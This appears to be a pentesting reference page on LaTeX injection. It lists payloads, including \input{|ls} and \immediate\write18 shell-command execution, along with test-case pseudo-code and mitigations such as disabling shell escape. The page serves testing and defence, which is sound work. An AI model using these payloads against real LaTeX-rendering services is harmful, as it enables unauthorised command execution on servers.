LaTeX Injection
Description
LaTeX Injection occurs when an application accepts and processes LaTeX code from user input without proper validation, allowing attackers to inject and execute arbitrary LaTeX commands.
Example with Scenario
Scenario: A web application generates PDF documents based on user input using a LaTeX engine. An attacker can inject malicious LaTeX commands to manipulate the document or execute arbitrary code.
Payloads and Test Cases
Payloads
Executing Arbitrary LaTeX Commands:
\input{|ls}
Modifying Document Structure:
\begin{document} \section{Injected Section} \end{document}
Running Shell Commands:
\immediate\write18{touch /tmp/hacked}
Test Cases
Executing Arbitrary LaTeX Commands:
Payload:
\input{|ls}
Test Case:
% Send payload to the server sendPayloadToServer("\\input{|ls}"); % Verify if the application executes the ls command checkServerResponseForDirectoryListing();
Modifying Document Structure:
Payload:
\begin{document} \section{Injected Section} \end{document}
Test Case:
% Send payload to the server sendPayloadToServer("\\begin{document}\\section{Injected Section}\\end{document}"); % Verify if the application renders the injected section checkPDFForInjectedSection("Injected Section");
Running Shell Commands:
Payload:
\immediate\write18{touch /tmp/hacked}
Test Case:
% Send payload to the server sendPayloadToServer("\\immediate\\write18{touch /tmp/hacked}"); % Verify if the application runs the shell command checkServerForFile("/tmp/hacked");
Mitigation
Input Validation:
Validate and sanitize user input to ensure it does not contain malicious LaTeX commands.
Use allow-lists to restrict input to safe LaTeX commands.
Disable Shell Escape:
Configure the LaTeX engine to disable shell escape (e.g.,
--no-shell-escape
).Prevent the execution of external commands from within LaTeX.
Use a Secure LaTeX Processor:
Use secure LaTeX processing tools that provide protection against injection attacks.
Enable built-in security features to sanitize LaTeX input.
Content Security Policy (CSP):
Implement a strict Content Security Policy to limit the sources from which content can be loaded.
Use CSP to prevent the execution of inline scripts and styles.
Last updated